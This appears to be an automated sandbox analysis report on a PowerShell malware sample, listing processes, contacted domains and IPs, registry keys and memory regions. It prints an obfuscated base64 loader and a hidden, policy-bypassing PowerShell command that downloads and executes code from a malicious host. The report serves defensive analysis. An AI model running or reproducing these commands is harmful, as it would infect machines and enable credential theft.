YATABTAHEAawBTAGcAUQBRAE8AUQBxADEAbQBmAGwASQBMAHEAeQB0ADQAegBXAFQAVgBPAEsATQBzAE8ARgBiAEwAUgBKAE4ATgA1AHkAZwBVADQAdQBWAEEAQQBTAGUAaQAyAG4AMgB6AHEAaQBWADAARABVAHkARABmAFEAOAAzAEIARwA5AHcAQQBMAEsAUgBDADkAcwBVAEEATQBHAGEAQwB2AFcAUABVAGYAVABrADYAMQB5AEMAWAB0AHMAdgB0AFgAZwB4AEkANQBZAGsAWQBFAHkAQQBJAHUAbABpAEEAdwBKAHQAYQByADQAVQBOAEgAWAB6AHYAQwBaAEEAdwB4AGEAVABlAHgAMwB0AGMATgBSAHoAcABQAHQAawBzADAATwBjAE0AZwBrAEcAaQBxAEoAMQBsAE4ATQBDAEcAawBPAGUAMwBrAHYASAA5AFgAYQA3AHIAMwBTAFAAMwBrAFUAeQBwAGIAMgB2AHgAUgAzAEQAbQBsAHcAbQBoAGgAcwBlAEwARQBmADkAaQBZAEwAZABCAE8AMwBYAFkAcwBjAFgAYgBDAEQAbQBhAGoAYQB0AGUAdAB3AHYANgBqAEQAZQBLAFYAMwB1AG8ASABaAFUAZABrAFcAUAA1ADAAUwBJAHQAbABXAFEAcABkAGUAZABVAEwAagBuAGwAcABCAEgATgBCAEEAeQB1AEIAOAB0AEsARABTAFIAdQBHAGEASABQAEYAVwBsAEEATwB5AGEASgBhAGoAIAAoACQAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAE0ATwBSAHkAcwBUAFIARQBBAE0AKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAKAAiAEYAcgBvAG0AQgAiACAAKwAiAGEAcwBlADYAIgAgACsAIAAiADQAUwB0AHIAaQBuAGcAIgApACgAIgBOAFkAKwB4AGIAbwBNAHcARgBFAFYALwA1AFkAawBsAE0ATgBnAGsAYQBsAE4AVgAyAFMASQA2AFoASwBqAFMAUwBBAHcAcwBEAEQASAA0AEUAVgB3AFoAUAA4AHQAKwB3AGUASAB2AFMAMQBwADEAdgBIAGMANAA5ADkAeQBhAFYAVwBCAHgAQwBkAFIAagBqAEoAQgBWAGgANwBZAHgAVABsAE8ASwBiAGIAMwBFAGgAdABMAGIANgAzADkAeABvAFkAUwBoAEgAdABIAGEAZAB0ADcASgBiAGUAdQBmAE8AVAA2AHoAeABBAGQAbQBJAEkANwBoAGQAcAAvAFEAOABhAGUASgBEAEoAbABJAE0AQgBxAHQAMABZAEYAQQBEADkAMwBpADEAYwBvAFgAagBqAHkASQBpAHEAWgBKAE8AUQAzAFgAegBPAEEARAA4AHYAeQBNAFMAWAB4ADEAMwA5AGcAegByAEsATwBNAGsAegB3AGoAeQB3AGEANwB5AHAAcQBWAFYAOABnAFAAUwBzADYAUwAwAGoAVQBIADQAMgA3ADUAWgBtAFQAMgA4AFYAQwBXAHUASgBNAEQARwBVAHMAegBCAHIANABIAHAAMABJAHcAcwA3AEkAeQBqAHUAVABMAGYAZgArACsATgB5ADkAegBOADgAaABaAEQANQB1AGkAdQBHAGEAcgA0AHQAKwBWAG0AaABlAEwAYwBQAHEAMQArAHcARQA9ACIAKQApACkAKQAsACAAWwBpAG8ALgBjAE8AbQBwAHIARQBzAHMASQBvAG4ALgBjAG8AbQBQAHIARQBTAFMAaQBPAG4AbQBPAEQARQBdADoAOgAoACIARABlACIAIAArACIAYwBvAG0AcAByAGUAcwBzACIAKQApACkALAAgAFsAdABFAHgAdAAuAEUAbgBjAG8ARABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jarry-deatile.bond
|
|
||
|
https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf
|
172.67.194.161
|
|
|
|
immolatechallen.bond
|
|
||
|
idealizetreez.shop
|
|
||
|
pain-temper.bond
|
|
||
|
growthselec.bond
|
|
||
|
https://idealizetreez.shop/api
|
104.21.64.1
|
|
|
|
stripedre-lot.bond
|
|
||
|
jarry-fixxer.bond
|
|
||
|
crookedfoshe.bond
|
|
||
|
https://e1.foiloverturnarrival.shop
|
unknown
|
|
|
|
strivehelpeu.bond
|
|
||
|
https://idealizetreez.shop:443/api.default-release/key4.dbPK
|
unknown
|
||
|
https://github.com/mgravell/protobuf-netJ
|
unknown
|
||
|
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
|
unknown
|
||
|
http://ocsp.sectigo.com0
|
unknown
|
||
|
http://www.smartassembly.com/webservices/Reporting/UploadReport2
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_me
|
unknown
|
||
|
http://www.smartassembly.com/webservices/Reporting/
|
unknown
|
||
|
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
|
unknown
|
||
|
http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL
|
unknown
|
||
|
https://klipgibob.shop/
|
unknown
|
||
|
https://github.com/mgravell/protobuf-neti
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://stackoverflow.com/q/11564914/23354;
|
unknown
|
||
|
https://klipgibob.shop/int_clp_8888.txt
|
172.67.212.45
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://e1.foilovMicrosoft.PowerShell.Utility.psd1
|
unknown
|
||
|
https://developers.cloudflare.com/r2/data-access/public-buckets/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://e1.foilovM
|
unknown
|
||
|
https://idealizetreez.shop/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://sectigo.com/CPS0
|
unknown
|
||
|
https://stackoverflow.com/q/14436606/23354
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://idealizetreez.shop:443/api
|
unknown
|
||
|
https://f1.foiloverturnarrival.shop/riiw1.mp3
|
172.67.194.161
|
||
|
https://idealizetreez.shop/&
|
unknown
|
||
|
https://klipgibob.shop/R
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
|
unknown
|
||
|
https://github.com/mgravell/protobuf-net
|
unknown
|
||
|
https://klipgibob.shop/d
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.smartassembly.com/webservices/Reporting/UploadReport2v
|
unknown
|
||
|
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
|
unknown
|
||
|
https://stackoverflow.com/q/2152978/23354
|
unknown
|
||
|
https://www.cloudflare.com/favicon.ico
|
unknown
|
||
|
http://www.smartassembly.com/webservices/UploadReportLogin/
|
unknown
|
||
|
https://klipgibob.shop:443/int_clp_8888.txtt
|
unknown
|
||
|
https://idealizetreez.shop/apiP
|
unknown
|
There are 45 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
e1.foiloverturnarrival.shop
|
172.67.194.161
|
|
|
|
idealizetreez.shop
|
104.21.64.1
|
|
|
|
f1.foiloverturnarrival.shop
|
172.67.194.161
|
||
|
klipgibob.shop
|
172.67.212.45
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.64.1
|
idealizetreez.shop
|
United States
|
|
|
|
172.67.194.161
|
e1.foiloverturnarrival.shop
|
United States
|
|
|
|
172.67.212.45
|
klipgibob.shop
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
668F000
|
trusted library allocation
|
page read and write
|
|
|
|
6898000
|
trusted library allocation
|
page read and write
|
|
|
|
6309000
|
heap
|
page read and write
|
||
|
4E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
336F000
|
heap
|
page read and write
|
||
|
EB59000
|
trusted library allocation
|
page read and write
|
||
|
AD13000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AD9D000
|
heap
|
page read and write
|
||
|
502F000
|
stack
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
4F6E000
|
stack
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
8851000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
51D0000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
2F05000
|
heap
|
page read and write
|
||
|
7EF0000
|
trusted library allocation
|
page read and write
|
||
|
ABB3000
|
heap
|
page read and write
|
||
|
3334000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
ABB8000
|
heap
|
page read and write
|
||
|
A5B7000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
51A0000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
AD59000
|
heap
|
page read and write
|
||
|
79FE000
|
stack
|
page read and write
|
||
|
AC71000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
4D60000
|
trusted library allocation
|
page read and write
|
||
|
44FF000
|
stack
|
page read and write
|
||
|
88AE000
|
heap
|
page read and write
|
||
|
7B82000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
ABB6000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
EE10000
|
trusted library allocation
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
88EC000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
52A5000
|
trusted library allocation
|
page execute and read and write
|
||
|
754F000
|
stack
|
page read and write
|
||
|
7A4E000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
4ABE000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7B6B000
|
heap
|
page read and write
|
||
|
ABB4000
|
heap
|
page read and write
|
||
|
71F8000
|
trusted library allocation
|
page read and write
|
||
|
ABBB000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
AC6B000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
7F820000
|
trusted library allocation
|
page execute and read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
EBB0000
|
trusted library section
|
page read and write
|
||
|
A70D000
|
heap
|
page read and write
|
||
|
352E000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AE0E000
|
heap
|
page read and write
|
||
|
AD55000
|
heap
|
page read and write
|
||
|
878E000
|
stack
|
page read and write
|
||
|
5030000
|
heap
|
page execute and read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AC57000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
7D5E000
|
stack
|
page read and write
|
||
|
7360000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
4E24000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
78CE000
|
stack
|
page read and write
|
||
|
89CE000
|
stack
|
page read and write
|
||
|
89E0000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
7672000
|
heap
|
page read and write
|
||
|
8510000
|
trusted library allocation
|
page read and write
|
||
|
37A0000
|
heap
|
page read and write
|
||
|
7ED0000
|
trusted library allocation
|
page read and write
|
||
|
5160000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
51B0000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AC68000
|
heap
|
page read and write
|
||
|
ABB0000
|
heap
|
page read and write
|
||
|
305A000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
622C000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
797D000
|
stack
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6308000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page execute and read and write
|
||
|
857D000
|
stack
|
page read and write
|
||
|
AD22000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
4DB0000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
29AC000
|
heap
|
page read and write
|
||
|
6308000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7590000
|
heap
|
page execute and read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AA60000
|
trusted library allocation
|
page execute and read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
308D000
|
heap
|
page read and write
|
||
|
4E2F000
|
stack
|
page read and write
|
||
|
6C1E000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AE9D000
|
heap
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
5070000
|
heap
|
page execute and read and write
|
||
|
7A0E000
|
stack
|
page read and write
|
||
|
4E10000
|
trusted library allocation
|
page read and write
|
||
|
4E40000
|
heap
|
page readonly
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
8810000
|
heap
|
page read and write
|
||
|
8A93000
|
heap
|
page read and write
|
||
|
ADF6000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
4D40000
|
trusted library section
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A3D000
|
stack
|
page read and write
|
||
|
52D0000
|
heap
|
page readonly
|
||
|
AC6B000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
51D6000
|
trusted library allocation
|
page read and write
|
||
|
ABB1000
|
heap
|
page read and write
|
||
|
52BA000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
ADC9000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
51C0000
|
heap
|
page read and write
|
||
|
3111000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
6089000
|
trusted library allocation
|
page read and write
|
||
|
AC64000
|
heap
|
page read and write
|
||
|
4F60000
|
trusted library allocation
|
page read and write
|
||
|
6307000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
4ECC000
|
stack
|
page read and write
|
||
|
A9A2000
|
heap
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
4E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
AD20000
|
heap
|
page read and write
|
||
|
7370000
|
heap
|
page read and write
|
||
|
ABC5000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AC57000
|
heap
|
page read and write
|
||
|
89F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
728E000
|
stack
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
AC5D000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
88F9000
|
heap
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
72CA000
|
stack
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
AD1D000
|
heap
|
page read and write
|
||
|
7F00000
|
trusted library allocation
|
page read and write
|
||
|
ACDF000
|
heap
|
page read and write
|
||
|
ABB0000
|
heap
|
page read and write
|
||
|
75DE000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
4D6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
ABB4000
|
heap
|
page read and write
|
||
|
764F000
|
stack
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
2E78000
|
stack
|
page read and write
|
||
|
7BB4000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
A5DC000
|
heap
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
4B2E000
|
stack
|
page read and write
|
||
|
52E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
734B000
|
stack
|
page read and write
|
||
|
A723000
|
heap
|
page read and write
|
||
|
ABB0000
|
heap
|
page read and write
|
||
|
8910000
|
trusted library allocation
|
page read and write
|
||
|
AF1C000
|
heap
|
page read and write
|
||
|
AD47000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6D20000
|
trusted library allocation
|
page read and write
|
||
|
5401000
|
trusted library allocation
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
9A20000
|
trusted library allocation
|
page read and write
|
||
|
7DDE000
|
stack
|
page read and write
|
||
|
ACFF000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
BA91000
|
trusted library allocation
|
page read and write
|
||
|
772F000
|
stack
|
page read and write
|
||
|
7B32000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
4EA2000
|
trusted library allocation
|
page read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
74CE000
|
stack
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AD11000
|
heap
|
page read and write
|
||
|
748D000
|
stack
|
page read and write
|
||
|
AC6B000
|
heap
|
page read and write
|
||
|
ABB1000
|
heap
|
page read and write
|
||
|
63C1000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
ABB1000
|
heap
|
page read and write
|
||
|
748E000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
750E000
|
stack
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
2E3C000
|
stack
|
page read and write
|
||
|
8ABC000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
76EE000
|
stack
|
page read and write
|
||
|
AC70000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
8867000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AA99000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
356E000
|
stack
|
page read and write
|
||
|
88B2000
|
heap
|
page read and write
|
||
|
7AE5000
|
heap
|
page read and write
|
||
|
84E0000
|
heap
|
page read and write
|
||
|
2A39000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page read and write
|
||
|
A641000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
ADD8000
|
heap
|
page read and write
|
||
|
ABB8000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
CC49000
|
trusted library allocation
|
page read and write
|
||
|
28C0000
|
heap
|
page read and write
|
||
|
758E000
|
stack
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
70BD000
|
stack
|
page read and write
|
||
|
7B38000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
4D8A000
|
trusted library allocation
|
page execute and read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
52F0000
|
heap
|
page execute and read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
A7B1000
|
heap
|
page read and write
|
||
|
6308000
|
heap
|
page read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
3298000
|
stack
|
page read and write
|
||
|
ABB4000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AC82000
|
heap
|
page read and write
|
||
|
C491000
|
trusted library allocation
|
page read and write
|
||
|
ABCD000
|
heap
|
page read and write
|
||
|
6307000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
666E000
|
trusted library allocation
|
page read and write
|
||
|
AC49000
|
heap
|
page read and write
|
||
|
4DFE000
|
stack
|
page read and write
|
||
|
7B3B000
|
heap
|
page read and write
|
||
|
7ACD000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AD36000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
53DC000
|
stack
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
EBF1000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
880E000
|
stack
|
page read and write
|
||
|
7854000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
3028000
|
heap
|
page read and write
|
||
|
4D70000
|
trusted library allocation
|
page read and write
|
||
|
ADB5000
|
heap
|
page read and write
|
||
|
A441000
|
trusted library allocation
|
page read and write
|
||
|
6308000
|
heap
|
page read and write
|
||
|
49BD000
|
stack
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
60A9000
|
trusted library allocation
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
8EEC000
|
stack
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
78A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
ACF3000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
CACE000
|
stack
|
page read and write
|
||
|
ADB9000
|
heap
|
page read and write
|
||
|
4D95000
|
trusted library allocation
|
page execute and read and write
|
||
|
AD9B000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
4E3F000
|
stack
|
page read and write
|
||
|
9A41000
|
trusted library allocation
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
AC76000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
AE8C000
|
heap
|
page read and write
|
||
|
AC50000
|
heap
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
7CC9000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
33F6000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7E90000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AC70000
|
heap
|
page read and write
|
||
|
7B21000
|
heap
|
page read and write
|
||
|
ABB3000
|
heap
|
page read and write
|
||
|
ABB1000
|
heap
|
page read and write
|
||
|
497C000
|
stack
|
page read and write
|
||
|
7A9D000
|
heap
|
page read and write
|
||
|
ABB4000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
595A000
|
trusted library allocation
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6C8E000
|
trusted library allocation
|
page read and write
|
||
|
AE98000
